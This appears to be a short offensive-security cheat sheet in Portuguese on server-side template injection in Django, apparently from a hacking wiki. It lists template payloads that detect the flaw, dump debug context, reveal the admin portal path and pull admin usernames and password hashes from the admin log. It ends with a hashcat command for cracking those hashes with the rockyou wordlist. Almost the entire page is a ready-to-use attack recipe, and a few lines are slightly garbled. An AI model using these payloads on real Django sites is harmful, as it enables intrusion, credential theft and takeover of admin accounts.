Injeção de Modelo no Servidor

Detecção: {% if 'ahsan' == 'ahsan' %} a {% endif %}

Depuração: {% debug %}

Divulgando Portal do Admin: {% include 'admin/base.html' %} = /secret-admin-portal

Divulgando Credenciais:

{% load log %} {% get_admin_log 10  log %} {% for e in log %}
{{e.user.get username}} : {{e.user.password}} {% endfor %}

Credenciais com hash do Django Descartadas

Descriptografado usando Hashcat:

hashcat -m 10000 hashed_passwords rockyou. txt = Django Admin Panel Pwn

PreviousLow Hanging FruitNextControle de Conta via Desvio de Limite de Taxa

Last updated